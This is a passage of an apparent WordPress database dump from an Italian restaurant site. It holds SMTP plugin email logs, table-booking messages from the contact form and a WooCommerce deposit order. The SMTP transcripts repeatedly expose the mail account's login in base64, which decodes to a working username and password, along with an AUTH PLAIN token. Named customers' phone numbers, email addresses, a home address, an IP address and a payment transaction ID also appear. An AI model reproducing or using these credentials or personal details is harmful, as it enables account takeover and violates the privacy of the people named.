pranzo siete aperti. Sar=C3=B2 a Rimini=\r\n con mia moglie e forse riusciamo a passare per il pranzo... Grazie!=0A=\r\n=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo d=\r\ni contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kZxvR-0008Hv-0F\r\n'),(22327,1214,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22328,1214,'success',''),(22329,1214,'from_header','Monia Corsi <notifiche@ristorantesolymar.it>'),(22330,1214,'to_header','teosphone@gmail.com'),(22331,1214,'reply_to_header','lagattola76@yahoo.it'),(22332,1214,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22333,1214,'original_to','teosphone@gmail.com'),(22334,1214,'original_subject','Da sito Sol Y Mar: \"Richiesta disponibilità\"'),(22335,1214,'original_message','Da: Monia Corsi <lagattola76@yahoo.it>\nTelefono: 3472765800\nOggetto: Richiesta disponibilità\n\nCorpo del messaggio:\nBuonasera. \r\nVorrei sapere se avete la disponibilità x sabato 07/11/2020 a pranzo x due persone\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22336,1214,'original_headers','From: Monia Corsi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: lagattola76@yahoo.it\n'),(22337,1214,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 12:34:11 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22338,1215,'solution','Not found, check status column for more info.'),(22339,1215,'success','1'),(22340,1215,'from_header','Monia Corsi <notifiche@ristorantesolymar.it>'),(22341,1215,'to_header','teosphone@gmail.com'),(22342,1215,'reply_to_header','lagattola76@yahoo.it'),(22343,1215,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22344,1215,'original_to','teosphone@gmail.com'),(22345,1215,'original_subject','Da sito Sol Y Mar: \"Richiesta disponibilità\"'),(22346,1215,'original_message','Da: Monia Corsi <lagattola76@yahoo.it>\nTelefono: 3472765800\nOggetto: Richiesta disponibilità\n\nCorpo del messaggio:\nBuonasera. \r\nVorrei sapere se avete la disponibilità x sabato 07/11/2020 a pranzo x due persone\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22347,1215,'original_headers','From: Monia Corsi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: lagattola76@yahoo.it\n'),(22348,1215,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 12:34:13 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Monia Corsi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: lagattola76@yahoo.it\r\nMessage-Id: <9dc235f7609150f21dbb09f1e32d5268@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?Da=20sito=20Sol=20Y=20Mar:=20\"Richiesta=20disponibilit=C3=A0\"?=\r\nDate: Tue, 03 Nov 2020 17:34:13 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Monia Corsi <lagattola76@yahoo.it>=0ATelefono: 3472765800=0AOggetto:=\r\n Richiesta disponibilit=C3=A0=0A=0ACorpo del messaggio:=0ABuonasera. =0D=\r\n=0AVorrei sapere se avete la disponibilit=C3=A0 x sabato 07/11/2020 a pr=\r\nanzo x due persone=0D=0AGrazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1ka0CD-0006Dc-Gd\r\n'),(22349,1216,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22350,1216,'success',''),(22351,1216,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22352,1216,'to_header','webmaster@baldisserri.com'),(22353,1216,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22354,1216,'original_to','webmaster@baldisserri.com'),(22355,1216,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22356,1216,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Fastest Cache version 0.9.1.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22357,1216,'original_headers',''),(22358,1216,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 19:22:49 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22359,1217,'solution','Not found, check status column for more info.'),(22360,1217,'success','1'),(22361,1217,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22362,1217,'to_header','webmaster@baldisserri.com'),(22363,1217,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22364,1217,'original_to','webmaster@baldisserri.com'),(22365,1217,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22366,1217,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Fastest Cache version 0.9.1.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22367,1217,'original_headers',''),(22368,1217,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 19:22:51 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <7ea818c70d511d4b868e524579227a27@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Wed, 04 Nov 2020 00:22:51 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- WP F=\r\nastest Cache version 0.9.1.2=0A=0A=0AIf you experience any issues or nee=\r\nd support, the volunteers in the WordPress.org support forums may be abl=\r\ne to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Te=\r\nam\r\n.\r\n250 OK id=1ka6Zf-0005LZ-Gp\r\n'),(22369,1218,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22370,1218,'success',''),(22371,1218,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22372,1218,'to_header','webmaster@baldisserri.com'),(22373,1218,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22374,1218,'original_to','webmaster@baldisserri.com'),(22375,1218,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22376,1218,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22377,1218,'original_headers',''),(22378,1218,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 04 Nov 2020 19:23:26 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22379,1219,'solution','Not found, check status column for more info.'),(22380,1219,'success','1'),(22381,1219,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22382,1219,'to_header','webmaster@baldisserri.com'),(22383,1219,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22384,1219,'original_to','webmaster@baldisserri.com'),(22385,1219,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22386,1219,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22387,1219,'original_headers',''),(22388,1219,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 04 Nov 2020 19:23:28 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <664a56d6394abcf5f8b7b7261659c2b4@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Thu, 05 Nov 2020 00:23:28 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Popu=\r\np Builder version 3.69.5=0A=0A=0AIf you experience any issues or need su=\r\npport, the volunteers in the WordPress.org support forums may be able to=\r\n help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kaT3o-00025L-MY\r\n'),(22389,1220,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22390,1220,'success',''),(22391,1220,'from_header','LUCA VERUCCHI <notifiche@ristorantesolymar.it>'),(22392,1220,'to_header','teosphone@gmail.com'),(22393,1220,'reply_to_header','luca.verucchi@virgilio.it'),(22394,1220,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22395,1220,'original_to','teosphone@gmail.com'),(22396,1220,'original_subject','Da sito Sol Y Mar: \"Prenotazione Domenica 8 Novembre 2020\"'),(22397,1220,'original_message','Da: LUCA VERUCCHI <luca.verucchi@virgilio.it>\nTelefono: 3498222643\nOggetto: Prenotazione Domenica 8 Novembre 2020\n\nCorpo del messaggio:\nBuongiorno! Volevo, se possibile, prenotare un tavolo per 2 (due) persone alle ore 12:30, per domenica 8 novembre. \r\nSe possibile nei tavoli esterni, quelli più vicino alla spiaggia. Grazie, attendo vostre notizie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22398,1220,'original_headers','From: LUCA VERUCCHI <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: luca.verucchi@virgilio.it\n'),(22399,1220,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 05:08:41 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22400,1221,'solution','Not found, check status column for more info.'),(22401,1221,'success','1'),(22402,1221,'from_header','LUCA VERUCCHI <notifiche@ristorantesolymar.it>'),(22403,1221,'to_header','teosphone@gmail.com'),(22404,1221,'reply_to_header','luca.verucchi@virgilio.it'),(22405,1221,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22406,1221,'original_to','teosphone@gmail.com'),(22407,1221,'original_subject','Da sito Sol Y Mar: \"Prenotazione Domenica 8 Novembre 2020\"'),(22408,1221,'original_message','Da: LUCA VERUCCHI <luca.verucchi@virgilio.it>\nTelefono: 3498222643\nOggetto: Prenotazione Domenica 8 Novembre 2020\n\nCorpo del messaggio:\nBuongiorno! Volevo, se possibile, prenotare un tavolo per 2 (due) persone alle ore 12:30, per domenica 8 novembre. \r\nSe possibile nei tavoli esterni, quelli più vicino alla spiaggia. Grazie, attendo vostre notizie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22409,1221,'original_headers','From: LUCA VERUCCHI <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: luca.verucchi@virgilio.it\n'),(22410,1221,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 05:08:43 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: LUCA VERUCCHI <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: luca.verucchi@virgilio.it\r\nMessage-Id: <5d1493cba45d2085e91eef4fdbe62610@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione Domenica 8 Novembre 2020\"\r\nDate: Thu, 05 Nov 2020 10:08:43 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: LUCA VERUCCHI <luca.verucchi@virgilio.it>=0ATelefono: 3498222643=0AO=\r\nggetto: Prenotazione Domenica 8 Novembre 2020=0A=0ACorpo del messaggio:=\r\n=0ABuongiorno! Volevo, se possibile, prenotare un tavolo per 2 (due) per=\r\nsone alle ore 12:30, per domenica 8 novembre. =0D=0ASe possibile nei tav=\r\noli esterni, quelli pi=C3=B9 vicino alla spiaggia. Grazie, attendo vostr=\r\ne notizie.=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata d=\r\na un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kacCB-0004ca-KL\r\n'),(22411,1222,'_order_key','wc_order_MzJaFYytSBZH2'),(22412,1222,'_customer_user','0'),(22413,1222,'_payment_method','paypal'),(22414,1222,'_payment_method_title','PayPal'),(22415,1222,'_customer_ip_address','151.46.50.2'),(22416,1222,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1'),(22417,1222,'_created_via','checkout'),(22418,1222,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(22419,1222,'_billing_first_name','Raffaele'),(22420,1222,'_billing_last_name','Biondi'),(22421,1222,'_billing_address_1','Via cecati 13'),(22422,1222,'_billing_city','Reggio emilia'),(22423,1222,'_billing_state','RE'),(22424,1222,'_billing_postcode','42122'),(22425,1222,'_billing_country','IT'),(22426,1222,'_billing_email','raf.biondi@libero.it'),(22427,1222,'_billing_phone','3479247631'),(22428,1222,'_order_currency','EUR'),(22429,1222,'_cart_discount','0'),(22430,1222,'_cart_discount_tax','0'),(22431,1222,'_order_shipping','0.00'),(22432,1222,'_order_shipping_tax','0'),(22433,1222,'_order_tax','0'),(22434,1222,'_order_total','30.00'),(22435,1222,'_order_version','4.6.1'),(22436,1222,'_prices_include_tax','no'),(22437,1222,'_billing_address_index','Raffaele Biondi  Via cecati 13  Reggio emilia RE 42122 IT raf.biondi@libero.it 3479247631'),(22438,1222,'_shipping_address_index','        '),(22439,1222,'is_vat_exempt','no'),(22440,1222,'Payment type','instant'),(22441,1222,'_transaction_id','3CP05602JV0163742'),(22442,1222,'_paypal_status','completed'),(22443,1222,'PayPal Transaction Fee','1.37'),(22444,1222,'_date_paid','1604603057'),(22445,1222,'_paid_date','2020-11-05 20:04:17'),(22446,1222,'_download_permissions_granted','yes'),(22447,1222,'_recorded_sales','yes'),(22448,1222,'_recorded_coupon_usage_counts','yes'),(22449,1222,'_order_stock_reduced','yes'),(22450,1223,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22451,1223,'success',''),(22452,1223,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22453,1223,'to_header','notifiche@ristorantesolymar.it'),(22454,1223,'reply_to_header','Raffaele Biondi <raf.biondi@libero.it>'),(22455,1223,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22456,1223,'original_to','notifiche@ristorantesolymar.it'),(22457,1223,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) - 5 November 2020'),(22458,1223,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Raffaele Biondi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1222&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #1222]</a> (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Caparra - 2 (#caparrax2)		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">30,00<span 